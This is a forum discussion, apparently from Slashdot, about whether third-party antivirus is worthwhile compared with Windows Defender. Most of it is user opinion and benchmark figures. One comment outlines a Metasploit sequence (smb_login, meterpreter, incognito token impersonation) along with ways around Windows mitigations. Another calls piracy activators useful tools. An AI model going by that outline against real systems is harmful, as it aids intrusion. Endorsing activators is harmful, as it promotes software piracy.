Google Chrome Engineer Says Windows Defender 'the Only Well Behaved Antivirus', Cites 'Tons of Empirical Data'

Days after former Firefox developer Robert O'Callahan said that antivirus security suites are not necessary, and AV vendors are of little help. A Google Chrome engineer has echoed the same message, reaffirming that Microsoft's built-in software is indeed the most well-behaved security suite. From a report: Apparently the disdain for 3rd party AV solutions runs deep amongst browser developers, as in response to the threads a Google engineer, Justin Schuh, had this to say: "Browser makers don't complain about Microsoft Defender because we have tons of empirical data showing that it's the only well behaved AV."

Bit Defender

How well-behaved is Bit Defender?

Re:Bit Defender

[VanGarrett]

When I tried out Bit Defender in 2014, it would fill up my RAM, and I'd have to reboot once a day. It's been some time now, since I've used it, and I don't know if they ever got around to fixing that or not.

Re: Bit Defender

I currently use it as "Corporate" AV and we get every week at least one person with no network because of it

Re: Bit Defender

About as well behaved as a rabid dog. It ignored the settings I put in to have it not automatically delete files it disliked. You can guess what happened.l,which is particularly bad since I knew that they were harmless.

After the subscription ran out, it also wouldn't let me get files out of quarantine, and unless you have one of their corporate packages there appears to be no way to decrypt them readily. You have to send the (potentially private and sensitive) quarantine file to them and hope that they decrypt it right.

It did some other hare-brained things, too, but I can't recall them right this minute. However, I can say that I am staying far away from their products, especially the free version - last I checked it had even fewer options to stop it from acting on its own than the commercial package. It seems to hate you if you do much at all that an advanced user might be interested in.

Re:Bit Defender

[FyRE666]

BitDefender on OSX is terrible. I wouldn't recommend it to anyone for any reason. It often thrashes the CPU, increasing heat, battery usage, and obviously having a massive impact on disk performance on overall system responsiveness. I've never used it on Windows, and likely never will. Windows Defender has always been fine for me on Windows, I've tried McAfee etc in the past, and they've all been much more trouble than they're worth. I can't deal with the massive performance loss, and strange abnormalities that often impede software testing brought about by AV software meddling in the filesystem and network layer.

There's a reason so many otherwise useful programs try to smuggle AV onto your machine unless you happen to notice it, and opt out. It's because nobody would willingly subject themselves to that.

Re:Bit Defender

[JayHades]

I use Bit Defender and it didn't react at all like what I could read here (i.e. RAM filled etc,..) It's not taxing my computers like I've seen other packages do and it's not nagging me constantly. I think the heuristic scan graph should be evaluated, from https://chart.av-comparatives.... , NOT the file detection which relies on known patterns. Heuristic will be much more taxing for your CPU/RAM and also shows the logic of an AV. (Windows) Defender is the base of comparison in this chart, just to show how low it is... Bit Defender is the big dog in this chart.

Re:Bit Defender

[Applehu+Akbar]

On OS X, the built-in Xprotect is the only antivirus you need. Watch for 'social engineering' malware installs ("the email I clicked on looked just like it was from the bank, so I entered my machine password when it asked me to") and browser redirects.

I'd agree

I tend to agree. I used to have third party anti-virus on the wife's machine and the kids' machine, but really the most effective malware prevention is to take away root/admin privileges altogether. Anti-virus doesn't protect against the stupidity of users. If they install malware, no anti-virus will stop them. Almost everything that the anti-virus software caught was benign and were false alarms. And despite being useless, the crap software was a resource hog.

I have since uninstalled anti-virus. I will do an occasional malware bytes scan, but have done so less and less frequently as I find little but tracking cookies.

So, yes, I agree with this report.

Re: I'd agree

Completely agree as well, but that's only because third party AVs are all shit.

However on windows defender I would also agree that it's "well behaved" and conforms to "first do no harm mantra". However the reason is because it do fucking NOTHING.

so by doing NOTHING, it's better than all other AVs. That's it.

Re:I'd agree

[RogueyWon]

Same here, to be honest. AVG became unusable due to bloat a couple of years ago. Avast can have some serious issues when presented with a combination of Windows 10 with Anniversary Update and a Skylake CPU. The remainder all seem to be as bad as much of the malware they ostensibly protect you from.

I confess I spent a while feeling paranoid after I finally gave in and uninstalled Avast, but a few months on, I've had no problems with a combination of Windows Defender and a weekly Malwarebytes scan.

Re:I'd agree

[Joce640k]

AV software is 90% placebo. All virus writers test their wares against the major AV systems before they release them. Any virus you encounter in the wild is probably not going to trigger yours.

I keep all my email viruses in a folder to see how long it takes AV software to catch up. It can take weeks. Sometimes they never do.

Sandboxing and restricted permissions is the way to go (as you note).

Re: I'd agree

[TheRaven64]

Doing nothing is an improvement over many third-party antivirus products. Remember the fun Norton bug last year, where they had a buffer overflow in their image parser that meant that someone sending you an email with an image attachment (even if you never opened the attachment) could run arbitrary code with kernel privilege? Quite why they thought that the part of their program that parses and inspects data that's expected to be malicious should run with kernel privilege instead of in a deprivileged sandbox was never revealed. I don't want to particularly pick on Norton here - most of the other vendors have had remotely exploitable vulnerabilities that leave you worse off than if you didn't bother with their products at all.

Add to that, most antivirus products still use system-call interposition mechanisms that have been shown to be trivial to bypass for a decade (we used to set it as an exercise for undergrads).

Re:I'd agree

[xxxJonBoyxxx]

>> I keep all my email viruses in a folder to see how long it takes AV software to catch up. It can take weeks. Sometimes they never do.

I do this too. I also have a folder on Google Drive called "Viruses" for exactly the same purpose. It's been getting pretty full lately; I feel a little like Egon with his neighborhood-sized twinkie.

Re:I'd agree

Didn't AVG start tracking and selling user data recently?

I had to get rid of Avast since always pegged my CPU randomly and couldn't be stopped without restarting. No hard drive activity, just continuous 50-100% cpu usage.

Re:I'd agree

[David_Hart]

Same here, to be honest. AVG became unusable due to bloat a couple of years ago. Avast can have some serious issues when presented with a combination of Windows 10 with Anniversary Update and a Skylake CPU. The remainder all seem to be as bad as much of the malware they ostensibly protect you from.

I confess I spent a while feeling paranoid after I finally gave in and uninstalled Avast, but a few months on, I've had no problems with a combination of Windows Defender and a weekly Malwarebytes scan.

I've had no problem with Avast, Win 10, and the i5 Skylake on my Surface Pro 4. Not saying that there isn't one, just that I haven't experienced it.

My current security setup for all of my computers is Avast, Spybot S&D, and Spybot Anti-Beacon. The primary reason why I run Avast vs Defender is because Avast scans email on arrival and when sending and seems to have a bit more advanced protection. Defender only scans email when you open an attachment. One of these days, maybe my next computer, I'll drop Avast. But for now, this setup works for me.

Re:I'd agree

Malware Bytes is antimalware AND it's pretty damn well behaved in my experience - why is it getting counted out here?

Re:I'd agree

[Khyber]

Fuck, I thought I was the only one doing this. I must have around 1GB of auto-generated or carefully-saved malware (and a few MS-DOS virii) in my GMail account.

It just goes to show how stupid even those with "IT Expertise" can really be.

Re: I'd agree

They're probably referring to the pay version that sticks around in memory if you let it. The free version is on-demand only. Different kettle of fish especially since it acts a lot more like a regular application and doesn't interact with other programs nearly as invasively as a real time scanner would.

Re:I'd agree

[MrL0G1C]

If they install malware, no anti-virus will stop them.

'Start-up's should be ring-fenced tightly, if this is done the all it would take is a re-boot to de-fang a virus.

A program that doesn't start is harmless.

Re: I'd agree

[Darinbob]

My mother keeps getting viruses. She'll click on anything and everything as she has difficulty being paranoid online. Her antivirus DOES detect viruses.

If it interferes with the operation of the browser then that's perfectly fine with me.

Re:I'd agree

[Darinbob]

Except that I do see the 10% happening. Sure the smart viruses will get past it, but there are countless old viruses still making he round and my relatives keep finding them. You may as well say that locking the front door is 90% placebo, but you'd be pretty dumb to leave it unlocked all the time because there are attacks of opportunity.

Re:I'd agree

Many AV products scan things when they try to start running. They look for behaviors. A virus sitting in an email isn't a threat to anything and can't be identified from its behaviors because it isn't doing anything. I agree that most AV is crap, but your evaluation of AV software is just as bad. You only know enough to be dangerous, you don't know enough to understand what you're talking about, same with the other people replying to your post. Now if you trigger all those viruses on a daily bases then you might have a cause, but your computer would probably be so infected that one of infections silently nurtured your anti-virus software.

As to the GP who thinks limited right will save them, he's also wrong (unless you've blacklisted everything not on a whitelist but you didn't claim that). The OS is the only thing that's protected from limiting root access and yet the OS is the easiest thing to restore. You don't need to protect the OS. The user data is the most important thing and any malware the user can trigger can wipe out their data or what whatever they do. No root rights required. Removing root rights provides no protection for anything important on home computers (servers are a different story).

Individual, disconnected backups is your best protection from malware. You should never have all of your backups connected to the same computer at the same time. Ransomware could spread from the PC and encrypt all the backups. Move backups to write-once media only. Too much data? Then the fallout of losing it all is even greater.

Re: I'd agree

My Mom wants a new laptop because the one she's got is full of viruses. I told her she'll just do that to whatever computer she uses. She says "yeah but a new on would be faster!"
Okay Mom. Sure it will. For a day.

For the record we both use Avast so I really don't understand how she does it. It keeps my computer clean. I guess the real difference is I don't go to FB so I don't get hit with the latest and greatest malware.

Re: I'd agree

[ArmoredDragon]

Now if only Windows Defender would stop flagging useful tools like KMSpico and Daz's loader as malware.

Re:I'd agree

Totally agree user education is by far the best defence.

Re: I'd agree

Avast bough AVG a couple months ago so, yeah.

Re: I'd agree

[sevenisloud]

I stopped using AVG a few years ago (3 or 4 maybe?) when they started popping up notifications in the system tray that encouraged you to secure your browser. I accidentally clicked OK once and had my homepage and search changed to AVG safe search (in Firefox, IE and Chrome - it was very thorough). I uninstalled immediately and have found Microsoft's offering to be perfectly fine ever since.

Re:I'd agree

[david_thornley]

it doesn't seem to work very well. We've been trying it for years.

Re:I'd agree

[david_thornley]

Commercial anti-virus software won't protect you well from anything new, as you point out, but modern AV can recognize actions typical of malware, and their recognition databases get updated so last quarter's popular new virus will probably just be blocked today.

One problem with sandboxing and restricted permissions is that the user data is usually what's important. I can blow away and restore operating systems without a qualm, but I'd really miss my home directory stuff if it went. (That's why it's backed up, of course.)

Wish they hadn't said that.

Now Microsoft will promptly fuck up Defender.

I don't know about that

I have a friend who's a Windows Defender and he just goes on and on about how great Microsoft's products are. Pretty intrusive if you ask me.

Disable ad-blocker for a paragraph of twitter crap

[bignetbuy]

I clicked on the link, get a popup asking me to disable my ad-blocker...fine. Done. Turns out the article is about a paragraph and just regurgitates some twitter garbage. Utterly useless site.

Bullshit

I ran a windows 7 system, nothing weird just normal use, youtube, office work, some games (no bootleg) with just windows defender.
I uninstalled AVG (I know, I Know) and used the system for less than a month and notice odd issues so I decided to reinstall AVG and scan the system and it found several instances of different types of malware. Windows defender did not only not protect me but failed to detect the malware when scanning the system.
AVG picked them right up and quarantined them. Later on I did similar experiments with Avira and other AV and Windows Defender failed on other systems I have but the commonly used AV software worked fine.

Re:Bullshit

[jaklode]

With normal use you would not find "several instances of different types of malware" in the first place...

Re:Bullshit

AVG found *something*. Do you *really* know if it was a correctly found threat or just a false positive`? (Perhaps deliberately so you now "know" that AVG is better than Defender?)

Re: Bullshit

Go to the deepest pit of fire in hell and burn fucking AVG shill

AV Browser Addons

Antivirrus nowadays always try to install some sort of browser addon/plugin

Re:MicroShaft

What's this? russian troll army prefers that all Americans use Kaspersky?

Conflict of interest

[sjbe]

The problem is that every company other than Microsoft has a built in conflict of interest. The AV software companies profit motives are not aligned with providing a good user experience. A good anti-virus system should be nearly invisible. Hard to convince customers to pony up a lot of money for security software unless you are always in their face and an anti-malware system that does this inherently results a bad product. Worse they have to keep tacking on extra "features" and products to convince customers their product is better than the next guys. Their business model is based on scaring customers so they buy their product based on perceptions rather than actually keeping them safe.

Re:Conflict of interest

[Big+Hairy+Ian]

Yep https://www.google.co.uk/url?s...

Re:Conflict of interest

[AmiMoJo]

Symantec tried this about a decade ago. I think it was around 2007 they released a version of Norton Anti-Virus and Internet Security that actually didn't suck too much. It didn't grind the computer to a halt, it didn't nag constantly, it just quietly got on with its job. In one version they went from joint last with McAfee to being one of the best.

It must not have worked very well for them because the next year it started to pop up little messages again telling you that it has protected you from 9.8 billion tracking cookies. By about 2010 it was total crapware again.

I guess they found that if they don't constantly remind the customer that their software is saving them from the certain doom of having a cookie placed on their machine they might not renew it.

Re:Conflict of interest

[John.Banister]

Avast (Premier) doesn't bug me, except to try and sell their VPN when I bring up porn sites.

Re:Conflict of interest

[Solandri]

That's pretty much why I've stopped using 3rd party anti-virus, and just rely on Windows Defender. Dealing with all the unwanted and intrusive "features" and bugs in 3rd party anti-virus got to be more of a chore than dealing with actual viruses. When it's less annoying to deal with a virus infection after the fact than it is to live with your anti-virus every day, that's a pretty good sign you're doing something wrong.

Malwarebytes still gets my thumbs up though. Clean, simple, and effective.

Re:Conflict of interest

[mykepredko]

Excellent comment and I only wish other Microsoft products weren't so well behaved.

You know,
- Being asked to upgrade for "free" to an OS that routinely monitors your actions.
- Then being asked to upgrade to the "Pro" package.
- Getting asked to buy the latest versions of Office.

Re:Conflict of interest

Is this an issue with 'Consumer' grade versions of AV software only, or do corporate/business versions suffer from it as well? Has the quality for detection routines similarly suffered on the 'Business' side right along the 'Consumer' side, or do they have separate engines (constructs? architectures? not even sure of the term) that make one a higher quality product over the other. The one at my office seems to have an incredibly stripped down UI, but I can't really vouch for how good of an actual job it does... I don't suppose anyone has metrics or empirical data with respect to this.

Re:Conflict of interest

[indi0144]

You consider this acceptable? That the AV tracks into the "semantics" of your browser content in order to offer you a VPN? Would Chrome do the same and the privacytards would flip.

I use NOD AV and the only times i get bugged is when it blocks some bad resource, like a favicon or bad ad. It does not yell when it updates, I does not nag you with new versions. Set and forget and it's been like this for more than 10 years.

Re:Conflict of interest

[John.Banister]

I expect that it looks at everything coming in from outside the computer well enough to prevent anything malicious from getting in. Recognizing that incoming content originates from a popular porn provider seems pretty trivial by comparison. I only see the "Anyone can see where your're browsing" notices about once a week or so. It's not enough of an annoyance for me to feel strongly about it.

Re:Conflict of interest

[indi0144]

Yeah I get it, I have script blockers in all browsers but the AV catches everything before the browser gets a single bit. If I were to search "Nod AV keys" "Crack nod32" the AV will bitch. I'm aware of the AV having to know the content you're browsing, but from that to offer ads based on this data, and in a paid version nonetheless, nope.

Least effective too

[Somebody+Is+Using+My]

It's probably the "best-behaved" because it is one of the least effective anti-virus. It has terrible detection rates compared to its competitors. The other anti-virus programs may be pushier and embed themselves deeper into the host system, but that's necessary in order for them to (try to) root out the infections.

Arguably end-users do not need this sort of protection offered from better AV packages, that Microsoft's product is "good enough" for most users. Certainly, better Antivirus is no panacea; even the best scanner can still miss some viruses. Personally - having cleaned out too many virus-infected machines - I'd rather the end-user have the maximum available protection if only to slow down the infection rate a little, although that still doesn't help when the end-user deactivates the AV, never updates it or just flat-out ignores its warnings . But regardless of your opinion of the /necessity/ of the software, you can't simply judge Microsoft's offering without taking into consideration its effectiveness. It is "best behaved" (for whatever that means) because it simply /does less/.

Re:Least effective too

https://chart.av-comparatives.org/chart1.php
Just to summarize with a few popular AVs
Microsoft: 97% detection rate, 23 false positives
McAfee: 97.9% detection rate, 57 false positives
Kaspersky: 99.8% detection rate, 1 false positives
Avast: 99.6% detection rate, 13 false positives
F-Secure: 99.9% detection rate, 140 false positives
Doesn't look like MS is particularly bad.

Re:Least effective too

Is it time to play "spot the shill" already?

There are numerous comparisons of A/V software that rate MS Defender right in the middle of the pack with other A/V products, and a few that rate it higher or lower.

Anyone trying to throw shade on Defender probably has an agenda, or is at least ignoring or denying most of the available evidence.

Re:Least effective too

You actually don't know what you are talking about. You should read the response from Rob Koch at the link below which includes links to real world information and explains why Windows Defender is actually the best anti-virus solution for every Windows computer:

https://answers.microsoft.com/...

Re:Least effective too

You look at it from the wrong end, a 3% leak is a lot more than the 2.1% leak that McAfee has and way worse than the others.

Even more interesting is the percentage of new threats that's leaking through the gates of the anti-virus software packages. That's what really matters these days.

Re:Least effective too

[omfglearntoplay]

These charts have to be misleading. I'd stake my life that they take 10,000 old known malwares and test against them. Not surprisingly, every vendor detects them. Then they take a dozen or so new malwares, and 2 vendors catch them. Eventually you have the 99.1% vs. 98.9% type results and they all look about equal. They are certainly not equal.

All it takes is one of those new malware threats to bring down your business for a day. If you want a chance at catching them, you go with vendors that do a good job at the new stuff. In my experience, the free MS stuff doesn't ever catch the new stuff. Ever.

Re:Least effective too

I like how you ignored the false positives.

Re:Least effective too

also it is google. they prob find it easiest to mine/capture your data when you use defender.

Re:Least effective too

[AmiMoJo]

Windows Defender isn't going to save you if you are the kind of idiot who downloads random crapware. What it will save you from is a variety of exploits and other attempts to screw with your system. File based detection is a losing battle, virus writers are constantly testing their software with the latest definitions and making sure it passes by, and AV software is getting multiple updates a day to try to keep up.

Google and Mozilla have the right idea. Defence in depth. If you rely on just detecting bad files, you are screwed. If your AV software installs a plug-in that makes your browser less secure so that it can scan a few files and delete the odd cookie, you are screwed.

Re:Least effective too

[chispito]

a 3% leak is a lot more than the 2.1%

That depends entirely on what kinds of things are in the 3% and the 2.1%, as well as how often they are seen in real world usage.

Re:Least effective too

[chispito]

It's probably the "best-behaved" because it is one of the least effective anti-virus.

It works well for the kinds of people that are not engaged in risky computing in the first place. The other kind are not going to be saved by any kind of AV, but are probably a great source of income for you as a support tech.

It is "best behaved" (for whatever that means) because it simply /does less/.

If by "does less," you mean it is not hyperactive and so does not train your users to ignore its alerts then, yes, you are correct. It does less.

Re:Least effective too

[Parker+Lewis]

You're covering just one side of the problem (virus detection). Let's ignore that Windows Defender is really effective (it's close to the paid alternatives). The other side is about not raise so many false positives. Most of paid AVs raise so many false alarms that average Joe will tend to ignore the alerts or just uninstall the AV at all. Windows Defender, at the end of day, works because it has a good compromise of detection and low false alarms.

Re:Least effective too

[thegarbz]

It's probably the "best-behaved" because it is one of the least effective anti-virus. It has terrible detection rates compared to its competitors. The other anti-virus programs may be pushier and embed themselves deeper into the host system, but that's necessary in order for them to (try to) root out the infections.

Half the time the level of embedding IS the infection. I've never had Windows Defender cause an issue with the Offline Files service by locking the temporary files that Office creates when you hit save, resulting in the temporary files staying on the disk and the correct files going missing. I have with Mcafee. You don't get remote code exploits on Windows Defender just by sending someone an email or an RAR file unlike with Norton.

Nothing is quite as attractive than a program that runs with system privileges, behaves like a rootkit, and is full of bugs like most of the AV software out there.

Re:Least effective too

Sigh. I still remember times when a non-crafted false positive meant that the antivirus was broken. Those times have long gone. Now if an antivirus thinks your program does something abnormal you better alter the code until it passes or be a megacorp so that you get whitelisted. Less is sometimes more when the whole concept is flawed.

Frankly, people who get their computers constantly infected should be sandboxed themselves. Let them use closed-ecosystem devices or disconnect their computers from the net. Otherwise they are a danger to computing even if their computers had dozen layers of antiviruses fighting against each other.

Re:Least effective too

[roca]

I wrote about this in a followup: http://robert.ocallahan.org/20...

The problem is that, by design, AV software is ineffective at catching "new stuff", partly because malware authors can tweak new malware until it passes the classifiers of the major AV products.

So the reality is that every day new malware appears that will not be caught by even the best AV packages unless you're lucky. Real life detection rates will be significantly lower than seen in these tests. Even if the difference between Windows Defender and the others grows a bit, it may actually be less significant.

"A chance at catching them" isn't good enough. What you need are the systematic security measures deployed by modern OSes and browsers, more and better. And AV software gets in the way of that.

Re:Least effective too

[Darinbob]

A false positive is not a bad thing. The complaint in the article is not that the antivirus is not effective, but that it "interferes" with some applications. Which does not sound like a problem to me, just a bit more work for the developers.

Re:Least effective too

What we need is a system where the complete set of sources are available for all applications so that the bugs can actually be fixed such that no malware can exploit the system in the first place and if a bug is exploited then it can be patched quickly such that no further malware can exploit it. With anti-virus software it doesn't matter how much it detects because it can't ever stop the stream of new malware from coming through.

Ohh- that's right- there is this thing called GNU/Linux. Stupid will be stupid. Excuses for not using it are mostly the result of incompetent people including the majority of "technical" people. Installing GNU/Linux on hardware where we don't have the complete set of sources and the devices can't be properly supported is almost always going to end in a bad user experience. There is a solution- buy free software supported hardware and the problem goes away and 50% of the users are better suited by GNU/Linux than any other OS. And that's not that hard: http://www.thinkpenguin.com/ only sells such hardware and they've got all the common components, accessories, and computers for which can be properly supported. They are the Newegg / Apple of the GNU/Linux world.

Re:Least effective too

Evidence for these claims?

Re:Least effective too

[a_n_d_e_r_s]

Its all about how many viruses that are let through.

Microsoft being 3000% worse then F-Secure is not bad ?

Re:Least effective too

I take it miscarriage of justice is not a bad thing either then? Are we supposed to trust a virus scanner or is it just another weather report?

"Interference" not a bad thing either? Just a bit of more work? You think everything can be magically fixed by adding more "work" to it? You don't mind about the difference between well-engineered software that actually works reliably vs a pile of accumulated hacks to survive in real world equivalent of core wars?

Re:Least effective too

You can't just flip metrics like that and make a meaningful comparison when the other end is inexact. If n% of malware isn't even counted (maybe because it's unknown or evades classification), then the relevant numbers aren't 3% vs 2.1% but roughly (n+3)% vs (n+2.1)%.

Re:Least effective too

Blah blah. If every modification was a guaranteed step in positive direction, linux would probably be the most secure system in existence. Unfortunately, software can also go worse.

Re:Least effective too

[david_thornley]

Note that "risky computing" includes going to reputable websites without an ad blocker, and downloading third-party software from a site you haven't carefully vetted. Sigh.

Re:Disable ad-blocker for a paragraph of twitter c

[AmiMoJo]

These engineers forgot the most effective, powerful anti-virus product that is an absolutely essential install; the ad blocker.

As a security guy, I mostly agree...

[xxxJonBoyxxx]

All the AVs today pretty much catch the same low-hanging fruit, and there's no good reason to buy a third-party bolt-on anymore.

That said, I'm getting annoyed with AV packages still not being able to flag things like base-64-encoded Powershell scripts or Office doc VBS scripts that make direct references to system libraries. Almost all the malware that's made it through our defenses in the past six months has used one of these two techniques (plus a little code obfuscation, but still), and none of the AV packages I've tested (via sites that scan against dozens of packages) have ever flagged any of the most effective offenders.

Re:As a security guy, I mostly agree...

All the AVs today pretty much catch the same low-hanging fruit, and there's no good reason to buy a third-party bolt-on anymore.

from the last article in the Google Hates AV cycle:

It's like we are standing around the dead canary saying 'Thank god it inhaled all the poisonous gas'. -- Darren Bilby

bravo, guys. Where have you been all this time? glad you're finally here, though.

Re:As a security guy, I mostly agree...

base-64-encoded Powershell scripts

Do you mean encoded scripts or things like encoded binaries in the scripts? Or the obvious encoded scripts with encoded binaries? :)

I tend to agree as well.

[wierd_w]

Far too often, antivirus products follow the "cable television" market strategy:

"Yes, we know you already pay us for a subscription, but we can get so much more out of you by forcing you to see all kinds of shit you really don't want, including adverts for all our other services."

And, in the case of free antivirus, this too:

"We can see that you really dont want our full package, otherwise you would have bought it instead of opting for the free version-- but we feel compelled to try to upsell you each and every possible opportunity, and wont relent at all. We will even be really obnoxious with your notification area, and make your system play audio adverts, because that's how much we really want you to have a subscription (but see the prior market strategy-- we wont let up on the ads even if you do!)"

They invest tons of resources (both computational and time-wise) into making needlessly flashy UIs with big colorful buttons, and scary "CSI: Miami"-esque dialogs, when really--- the part that really matters-- how well they can trap execution events without bogging the system down-- seems to get nearly no love, and appears to get shittier and shittier.

Then you have Windows Defender. It's so plain, you instinctively ignore its presence. Excepting on older XP systems, (where there was a CPU utilization bug), it runs with a very modest system footprint. It does not constantly vomit spam into your system tray, and does not try to milk you for additional service agreements, or to switch to a paid version. It behaves itself very well.

If Avast or AVG behaved like that, instead of trying to be garishly tawdry and whorishly self-promoting like prostitutes, and reduced their system resource consumption habbits accordingly, they would win hands down.

But no, fleecing idiots is much more profitable.

Re:I tend to agree as well.

[cyberfunkr]

I commented the same way about *four and a half years ago*.
https://slashdot.org/comments....

AV spends too much time and resources on making things look pretty, yet scary, instead of actually doing an effective job.

Re:I tend to agree as well.

[roca]

Another poster points out above that inconspicuous third-part AV software would not "win hands down", because to the user it appears they've paid for software that doesn't do anything.

I did a complete 180 on AV software

[Billly+Gates]

I started doing PC support in my Field with Grandmas and small business.

AV software WAS USEFUL in the XP/98 era. I would argue with slashdoters calling them morons for not running it as you had 1 min max before infection on Windows 2000 or XP with no firewall!!L

We all ran admin istrator aka root and Win32 even had account personation services. Gee a dialup with no firewall or shitty software one with IE 6 running Java and Adobe flash without a sandbox on a local admin account was the norm so what could possibly go wrong!!??

Vista god bless it made UAC, privilege speration, scrambled ram addresses with aslr, buffer overflow protected buffers in c/c++, and psuedo local admin accountants which instead used a token to run something. Thanks Theo from OpenBSD for inspiration.

Windows 10 goes further too by using x86 features to separate data from executable bits directly on the CPU and signed bootloaders.

AdBlock and sandboxed Adobe products and AdBlock all make Windows OK now. Not perfect, but OK.

I just reused an Asus sabertooth I threw out in storage 2 years ago . I thought it was broken! Why? Esset kept making my ssds loose data. I thought SATA ports were bad. Went thru 3 expensive ssds. It was my damn AV software glitching them.

Keep updates current, run AdBlock, DNS service like the free Norton DNS servers on your router's, and heaven sakes don't click everything you download and you will be fine in 2017. AV software forges SSL certificates too which is dangerous

Re:I did a complete 180 on AV software

[Piata]

AV software forging SSL certificates is downright baffling. A client of mine kept having his website marked as insecure despite having an SSL certificate and all tests showing it was working properly. Turns out it was a false positive from his AV software and there's literally nothing you can do about it besides telling someone to uninstall their AV.

Re:I did a complete 180 on AV software

I never ran AV software on any computer from the days of DOS through Win7 and only recently have decided to leave Defender enabled on 8.1/10. You know what? I only ever got a single infection. That one infection came from a college computer lab where we were required to place our 3.5" disks in a dedicated lab machine that automatically scanned disks for viruses. That dedicated anti-virus scanning machine had itself been infected and resulted in every student's disk becoming infected and that infection getting brought home. Running AV software at home would not have prevented the infection either as there was no AV solution to prevent this particular virus at the time and none became available for another 3 months. The real solution is to keep secure backups of your data so that wiping your machine is nothing more than a minor inconvenience for the time it takes to re-image.

Re:I did a complete 180 on AV software

[Martin+Blank]

Win32 even had account personation services

Account impersonation is still there, even in 64-bit Windows. It's required for how Windows works. If you want to see it, set up a VM, run Metasploit against it (use smb_login) and get a meterpreter shell, load incognito, and list and impersonate tokens to your heart's content.

Vista god bless it made UAC, privilege speration, scrambled ram addresses with aslr, buffer overflow protected buffers in c/c++, and psuedo local admin accountants which instead used a token to run something.

UAC has numerous bypasses, privilege separation has existed since at least NT4 (maybe 3.51), ASLR only applies to the heap and only when the library or executable is compiled to do so (or is forced by EMET, which can crash some applications), buffer overflow protections can be bypassed using SEH or ROP gadgets, and as I mentioned above, tokens are still around. Another note on ASLR: it only takes one library in the entire chain of libraries called to not use ASLR to make it ineffective. Also, ASLR on 32-bit Windows is weak, having only 128 possible addresses without factoring in predictability that is inherent in the system, and if the process crashes and restarts relatively gracefully, it's not hard to hit a valid address. ASLR on 64-bit Windows is much more difficult to bypass.

Re:I did a complete 180 on AV software

[Martin+Blank]

That's not true. You can disable the SSL inspection in all of them. Finding the setting may be tricky, but it can be disabled.

Re:I did a complete 180 on AV software

You have to MITM SSL sessions to inspect them for malware payloads.

Yeah, it's as shitty but common practice. You should see the creepy shit "enteprise" security and content filtering schemes do with SSL.

Re:I did a complete 180 on AV software

[l20502]

Windows 10 goes further too by using x86 features to separate data from executable bits directly on the CPU and signed bootloaders.

Just because NX is now an hard-requirement doesn't mean previous version didn't use it, and signed bootloaders are evil.

Re: I did a complete 180 on AV software

Yes exactly! Looking at you BLUECOAT

Re:I did a complete 180 on AV software

[Billly+Gates]

So if I were a cracker I would just forge Norton or McAfee certificate and I can MITM all your freaking data! Hello spearfish from Lenovo all over again and free banking info now since I unencrypted your session to bank of America. That is scary and a big vulnerability. Enterprises get weekly updates. Home users don't

Re:I did a complete 180 on AV software

[Billly+Gates]

Windows10 has SEH handling and it requires work to get around ASLR. It's not impossible but compared to XP it's a big improvement

Re:I did a complete 180 on AV software

[Billly+Gates]

We use signed boot loaders at work and for me at home for a VM of Fedora. They provide rootkit protection and yes CentOS, FreeBSD, and Fedora use bootloaders. You sign your own and add the keys. You do not need to use Microsoft's ones. Microsoft does have keys for Redhat based Oses and FreeBSD if you want to go that route instead but in no way are you hostage to Redmond.

It's an intel standard

Re:I did a complete 180 on AV software

[Martin+Blank]

SEH has been present in some form since at least XP. It's old tech, with numerous bypasses. Windows 10's big improvement is Control Flow Guard.

Getting around ASLR is relatively easy if any library loads that does not use ASLR, and this is unfortunately very common.

As an insider, can confirm

[TodPunk]

I used to work for an AV vendor in their IT department. Others in my family have continued working in the software security industry for decades. They really are just bloated resource suckers with little value. As such, I haven't run anti-virus beyond windows defender for a little over 10 years, not even on my kids computers. They're kept up to date, ads are blocked on my network, and I have taught my kids how to recognize an executable from other kinds of files (thank god for re-enabling file extensions being shown, the stupidest Windows default of them all).

We had one virus when my daughter opened an email that gave her some nasty popups constantly. She learned a valuable lesson that day, but I was able to reverse it in less than an hour booting into safe mode and removing the files. Been fine otherwise.

Re:As an insider, can confirm

[aliquis]

Aren't Windows defender heavier than Bitdefender and Avast or something?
I saw some test of transaction times to start applications, copy files and such where Windows defender was slower.

Re:As an insider, can confirm

Others in my family have continued working in the software security industry for decades. They really are just bloated resource suckers with little value.

Your family can't be that bad, can they?

Re:As an insider, can confirm

[TodPunk]

I can't imagine it can be a whole lot more efficient than Windows Defender and still do as much. WD is really, really lean, and only checks for the most common malicious code. It's the 90% rule of anti-malware. If others are more efficient, I'd like to know why they thought they could throw out a given check of some kind, but I can't see how the gains would be that much when WD doesn't really do much in the first place (compared to the big dogs like Symantec or Kaspersky).

Oh really?

[JustNiz]

That does rather presume you're running Windows.
Which, lets be honest, Windows is SO badly full of security holes compared to any other OS that Microsoft HAD to come up with Defender to avoid loosing all credibility.

Defender still appears to really just be an easy copout workaround for Microsoft, rather than them addressing the actual problem which is the fundamentally weak architecture of Windows itself.

Re:Oh really?

[Ol+Olsoc]

Defender still appears to really just be an easy copout workaround for Microsoft, rather than them addressing the actual problem which is the fundamentally weak architecture of Windows itself.

The best antivirus software for Windows is Linux.

Re:Oh really?

Historically, yes.

But they've been beaten with that stick almost constantly for 20 years, and sometimes that sinks in.

Hence, it's a lot better now. (Not perfect, but a lot better).

Re:Oh really?

What malware authors love most about Linux is your attitude. It prevents you from really looking at your machine.

Re:Oh really?

Which, lets be honest, Windows is SO badly full of security holes compared to any other OS that Microsoft HAD to come up with Defender

It is not really viruses we're talking about but either trojans or exploits. I don't think they usually self-replicate.

I think it's not Windows itself that's full of security holes, but the app model of "double-click on this and brush away a few paragraphs of nonsense warnings to irrevocably merge random Internet code with your operating system forever."

  - There's no option to do that in the browser. Even high-risk things like extensions can be uninstalled.

  - The sheeple are getting herded into "App Stores" with whitelisting, developer reputation records, auto-updating, and, yes, cloud virus scanning (ex the Android Bouncer).

Also, while antivirus on Windows doesn't work, whitelisting works great, even without the app store.

Linux is somewhere between whitelisting-and-app-store with its package management system. It has always been this way because of the free software convention. Where proprietary software is involved in Linux, it's distributed in goofy ways and are equally risky. There's just so much less of it.

And for exploits, I think Linux is at least as bad as Windows. My gut impression of the GNOME stuff is, "much worse."

Re:Oh really?

Well, linux used to be secure. Until apple used unix for the basis of their os, and then gained popularity, and then became a financially viable malware target thus pulling linux down to their level.

Re:Oh really?

that works fine until Linux has the market share of Windows. The advantage Linux currently has is security through obscurity.

Re:Oh really?

[chispito]

Windows is SO badly full of security holes compared to any other OS that Microsoft HAD to come up with Defender to avoid loosing all credibility.

You misspelled "Android."

